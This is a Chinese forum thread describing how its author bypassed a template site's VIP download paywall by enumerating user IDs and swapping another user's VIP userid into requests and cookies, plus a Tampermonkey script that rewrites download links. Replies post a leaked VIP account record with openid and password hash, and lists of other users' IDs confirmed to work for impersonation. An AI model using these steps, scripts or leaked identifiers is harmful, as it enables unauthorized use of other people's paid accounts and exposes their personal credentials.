（已失效）xx之家vip下载分析

Arcticlyc

简介

前两天在看微信小程序搭建，想着找两个现成的模板放上去看看效果。在某网站找到了两个还不错的模板，准备下载的时候却发现需要vip，于是想用点技巧（手段）下载下来。

站点userid值已更新，方法已失效。

更新

看到坛友李玉风我爱你关于构造域名即可下载的方法，自己写了个油猴脚本方便下载（这个应该不算成品吧），不过仅限于下载网页模板，分享给大家使用（不太懂js，代码比较粗糙）。在模板页面点击立即下载就可以下载成功了。

// ==UserScript==
// @name         xx之家
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  no vip
// @AuThor       flower
// @match        *://www.cssmoban.com/*
// @Icon         https://www.google.com/s2/favicons?sz=64&domain=baidu.com
// @grant        none
// ==/UserScript==
(function() {
    'use strict';
    // Your code here...
     window.onload = function(){
         var url_1 = document.getElementsByClassName("item-preview")[0].attributes["data-url"].value,
             url_2 = document.getElementsByClassName("button btn-demo")[0].attributes["data-url"].value,
             pattern = new RegExp("demo(.+)\\/\\w+\\.html"),
             new_url = "http://down" + pattern.exec(url_1 || url_2)[1] + ".zip";
         console.log(new_url);
         document.getElementsByClassName("button btn-down")[0].setAttribute("href", new_url);
     };
})();

网址

aHR0cCUzQS8vd3d3LmNzc21vYmFuLmNvbS8=

过程

1. 进入网站首页，点击小程序模板，再任意打开一个模板后，点击立即下载。
   
   发现需要登录，选择一种方法登录。登录成功后，再次点击立即下载，发现请求了这么一个链接
   
   

2. 链接的响应中显示不是vip，于是想着修改响应体。但是经过几次调试后，发现修改响应体并没有作用，通过js跟进发现
   

3. 从这里可以知道，下载链接就在响应中，那么就只能修改请求体了。经过观察和调试，发现该网站账号基本上就是靠这个userid来辨别用户
   
   那么问题就简单了：只要有一个vip的id不就行了？可是如何获得vip的id呢？通过编写脚本获得了一个vip的id（此处不给出脚本，主要原理是通过循环发请求，看响应结果），更改userid的值并请求，下载成功。
   

4. 到此似乎很顺利，可是当进入其他类型模板并点击下载时，发现并没有上面提到的那个请求
   

   通过js跟进许久也没有找到原因，找了很久没有什么思路。最后在分析时突然看到此处
   

   想到上面说的，这个网站主要根据id来辨别用户，而此处表明id就储存在cookie中，那么就可以直接在cookie中修改id。关于修改cookie，控制台（application）可以直接修改，但是我有时候无法修改，于是在谷歌商店下载了一个插件Cookie-Editor。将userid更改为获取到的id，发现身份信息也更改了，再次点击立即下载，下载成功。
   

写在最后

在该网站下载了几个模板，发现其实是github上的，原作者也说得很清楚是免费的，结果到这里居然要vip。但是这种方法其实是利用了别人的账号特权，vip账户的会员也是花钱买的，而且对于vip账号每日下载有限制，确有需要可以利用这种方法去获取资源，但是希望不要因为一时兴起去利用vip批量下载。

odmin

[JavaScript] 纯文本查看 复制代码

{
	'code': 0,
	'myvip': {
		'id': 100334,
		'name': '富不足而贫有余',
		'openid': 'oe_Eds0D33cM93RgxRfac6tRePQI',
		'opentype': 'Weixin',
		'phoneno': None,
		'password': '4f7889fbdb11af4d3f4afbaea03b18a3',
		'viptype': 'vip.forever',
		'vip': 1,
		'vipstart': '2020-06-26 10:52:55',
		'vipend': '2120-06-26 10:52:55',
		'avatar': 'http://thirdwx.qlogo.cn/mmopen/vi_32/BSYm9NRSt3bL6cslKFUribZnAkfzJksLWAmIZFOMx6A9ra8Zqr9vrs8Nmnu9lqQO3GBoPVEsydtf6s60DPA9lYw/132',
		'date': '2020-06-26 10:46:37',
		'jinbi': 0,
		'logintime': '2022-11-29 09:48:15'
	},
	'myauth': [{
		'canusecount': 100000,
		'limitperdaydown': 100000,
		'mbtype_key': '20101085970749,20101822396269,20125072756579,20128505400649,20133453080191,20134889377598,20136294750679,20137004880497,20136294750679,20209539500826,20205720187005',
		'mbtype_name': '全站静态网站模板',
		'remark': '全站静态网站模板无限制下载',
		'usedcount': 2
	}]
}

简单的跑了一下VIP~~.
分享几个ID.

[Asm] 纯文本查看 复制代码

        100042 
        100058 
        100081 
        100125 
        100134 
        100155 
        100197 
        100228 
        100249 
        100277 
        100334 
        100381 

Heat

comcn 发表于 2022-11-29 13:02
大佬，我这个是终身的，但是提示下载限制
{
        "code": -4,

code: -4是达到了下载次数上限，根据楼主的提示，我用脚本跑出了一些userid出来，  可以用我贴出来的userid下载，q亲测有效。

        Line 1132: userid 101324 下载成功
        Line 1144: userid 101336 下载成功
        Line 1158: userid 101350 下载成功
        Line 1189: userid 101381 下载成功
        Line 1195: userid 101387 下载成功
        Line 1209: userid 101401 下载成功
        Line 1314: userid 101506 下载成功
        Line 1317: userid 101509 下载成功
        Line 1337: userid 101529 下载成功
        Line 1350: userid 101542 下载成功
        Line 1455: userid 101647 下载成功
        Line 1536: userid 101728 下载成功
        Line 1555: userid 101747 下载成功
        Line 1561: userid 101753 下载成功
        Line 1609: userid 101801 下载成功
        Line 1639: userid 101831 下载成功
        Line 1700: userid 101892 下载成功
        Line 1705: userid 101897 下载成功
        Line 1713: userid 101905 下载成功
        Line 1717: userid 101909 下载成功
        Line 1759: userid 101951 下载成功
        Line 1766: userid 101958 下载成功
        Line 1771: userid 101963 下载成功
        Line 1839: userid 102031 下载成功
        Line 1877: userid 102069 下载成功
        Line 1962: userid 102154 下载成功

Arcticlyc

a6233413 发表于 2022-11-30 14:06
写在最后的还是写在最前吧

本意是帮助有需要但是没有vip的朋友，确实没考虑到有些朋友会利用爬虫批量获取，感觉没啥意义。

Yccc

，不能改了，变成了：user_no: "2022112909333829167"

jincin

学习了 牛牛牛

hihiuddqw3e123

厉害的思路

小鸿同学

感谢提供思路，亲测有效

xhsj1997

太厉害了

deyiyao

向大佬学习新手来膜拜

gdhgn

学习了，cookie并非安全之地

whn502

厉害的思路

qinghuayuan

高手，感谢分享！！！

wanfeng12378766

谢谢分享